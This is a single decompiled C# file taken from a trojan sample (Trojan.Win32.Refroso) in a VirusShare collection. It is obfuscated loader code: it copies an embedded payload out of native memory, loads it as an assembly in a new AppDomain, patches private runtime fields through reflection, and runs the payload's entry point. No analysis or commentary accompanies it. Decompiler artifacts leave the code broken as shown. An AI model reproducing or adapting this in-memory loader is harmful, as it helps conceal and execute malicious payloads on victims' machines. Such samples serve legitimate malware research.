// Decompiled with JetBrains decompiler // Type: é.Ù // Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: BB91517D-96CD-4859-A72C-BFC1CBA44DE2 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Refroso.hqmj-a46444251debd74675b60bb330cf99debe122ec24698468f4a3835595fddbe4e.exe using \u0081é; using \u0082\u00BC; using System; using System.Reflection; using System.Runtime.InteropServices; namespace \u0081é { [Serializable] internal class \u0081Ù { private IntPtr \u0082\u00B0; private IntPtr á; private int Þ; private Assembly Û; private unsafe Assembly \u00F7() { byte* numPtr = (byte*) \u0082\u00BB.î((byte*) this.\u0082\u00B0.ToPointer()); if ((IntPtr) numPtr == IntPtr.Zero) return (Assembly) null; IntPtr ptr = (IntPtr) (void*) numPtr; int length1 = Marshal.ReadInt32(ptr); IntPtr source = (IntPtr) (void*) (numPtr + 4); byte[] rawAssembly = new byte[length1]; byte[] destination = rawAssembly; int length2 = length1; Marshal.Copy(source, destination, 0, length2); Assembly assembly = Assembly.Load(rawAssembly); Marshal.FreeCoTaskMem(ptr); return assembly; } private unsafe Assembly \u0089() { byte* numPtr = (byte*) \u0082\u00BB.ô((byte*) this.\u0082\u00B0.ToPointer()); if ((IntPtr) numPtr == IntPtr.Zero) return (Assembly) null; IntPtr ptr = (IntPtr) (void*) numPtr; string stringAnsi = Marshal.PtrToStringAnsi(ptr); Marshal.FreeCoTaskMem(ptr); Assembly assembly = (Assembly) null; try { assembly = Assembly.Load(stringAnsi); } catch (Exception ex) { } return assembly; } public static unsafe int \u0081Ö(Assembly _param0, int _param1) { // ISSUE: untyped stack allocation int num1 = (int) __untypedstackalloc(\u0082\u00BB.Õ()); IntPtr hinstance = Marshal.GetHINSTANCE(_param0.GetLoadedModules()[0]); int num2 = 0; \u0081Ù ù = new \u0081Ù(); ù.Û = _param0; ù.\u0082\u00B0 = hinstance; ù.Þ = _param1; IntPtr num3 = (IntPtr) (void*) &num2; ù.á = num3; AppDomain domain = AppDomain.CreateDomain(Guid.NewGuid().ToString()); int id = domain.Id; domain.AssemblyResolve += new ResolveEventHandler(\u0081Ù.ç); CrossAppDomainDelegate callBackDelegate = new CrossAppDomainDelegate(ù.í); domain.DoCallBack(callBackDelegate); try { AppDomain.Unload(domain); } catch (Exception ex1) when ( { // ISSUE: unable to correctly present filter uint exceptionCode = (uint) Marshal.GetExceptionCode(); if (\u0082\u00BB.\u0082\u00AE((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0) { SuccessfulFiltering; } else throw; } ) { uint num4 = 0; \u0082\u00BB.\u0081\u009A((void*) Marshal.GetExceptionPointers(), (void*) num1); try { try { } catch (Exception ex2) when ( { // ISSUE: unable to correctly present filter num4 = (uint) \u0082\u00BB.\u0084((void*) Marshal.GetExceptionPointers()); if (num4 != 0U) { SuccessfulFiltering; } else throw; } ) { } goto label_10; if (num4 != 0U) throw; } finally { \u0082\u00BB.ã((void*) num1, (int) num4); } } label_10: \u0082\u00BB.ù(); \u0082\u00BB.\u0095(id); return num2; } public unsafe void í() { FieldInfo fieldInfo = (FieldInfo) null; // ISSUE: untyped stack allocation int num1 = (int) __untypedstackalloc(\u0082\u00BB.Õ()); Assembly entryAssembly = Assembly.GetEntryAssembly(); uint exceptionCode; if ((object) entryAssembly == null) { \u0081ê.\u0081\u0099 = this.Û; try { fieldInfo = (FieldInfo) null; AppDomain currentDomain = AppDomain.CurrentDomain; AppDomainManager appDomainManager = currentDomain.DomainManager; if (appDomainManager == null) { appDomainManager = new AppDomainManager(); typeof (AppDomain).GetField("_domainManager", BindingFlags.Instance | BindingFlags.NonPublic)?.SetValue((object) currentDomain, (object) appDomainManager); } typeof (AppDomainManager).GetField("m_entryAssembly", BindingFlags.Instance | BindingFlags.NonPublic)?.SetValue((object) appDomainManager, (object) entryAssembly); } catch (Exception ex1) when ( { // ISSUE: unable to correctly present filter exceptionCode = (uint) Marshal.GetExceptionCode(); if (\u0082\u00BB.\u0082\u00AE((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0) { SuccessfulFiltering; } else throw; } ) { uint num2 = 0; \u0082\u00BB.\u0081\u009A((void*) Marshal.GetExceptionPointers(), (void*) num1); try { try { } catch (Exception ex2) when ( { // ISSUE: unable to correctly present filter num2 = (uint) \u0082\u00BB.\u0084((void*) Marshal.GetExceptionPointers()); if (num2 != 0U) { SuccessfulFiltering; } else throw; } ) { } goto label_18; if (num2 != 0U) throw; } finally { \u0082\u00BB.ã((void*) num1, (int) num2); } } } else \u0081ê.\u0081\u0099 = entryAssembly; label_18: Assembly assembly = (Assembly) null; switch (this.Þ & 805306368) { case 536870912: assembly = this.\u0089(); break; case 805306368: assembly = this.\u00F7(); break; } if ((object) assembly == null) return; MethodInfo entryPoint = assembly.EntryPoint; if ((object) entryPoint == null) return; object[] parameters = new object[0]; if (entryPoint.GetParameters().Length != 0) { string[] commandLineArgs = Environment.GetCommandLineArgs(); string[] destinationArray = new string[commandLineArgs.Length - 1]; int length = destinationArray.Length; if (length != 0) Array.Copy((Array) commandLineArgs, 1, (Array) destinationArray, 0, length); parameters = new object[1] { (object) destinationArray }; } object obj = entryPoint.Invoke((object) null, parameters); if (obj == null) return; try { Marshal.WriteInt32(this.á, Convert.ToInt32(obj)); } catch (Exception ex3) when ( { // ISSUE: unable to correctly present filter exceptionCode = (uint) Marshal.GetExceptionCode(); if (\u0082\u00BB.\u0082\u00AE((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0) { SuccessfulFiltering; } else throw; } ) { uint num3 = 0; \u0082\u00BB.\u0081\u009A((void*) Marshal.GetExceptionPointers(), (void*) num1); try { try { } catch (Exception ex4) when ( { // ISSUE: unable to correctly present filter num3 = (uint) \u0082\u00BB.\u0084((void*) Marshal.GetExceptionPointers()); if (num3 != 0U) { SuccessfulFiltering; } else throw; } ) { } return; if (num3 == 0U) return; throw; } finally { \u0082\u00BB.ã((void*) num1, (int) num3); } } } public static Assembly ç(object _param0, ResolveEventArgs _param1) => \u0082\u00BB.\u0081õ(_param1.Name); } }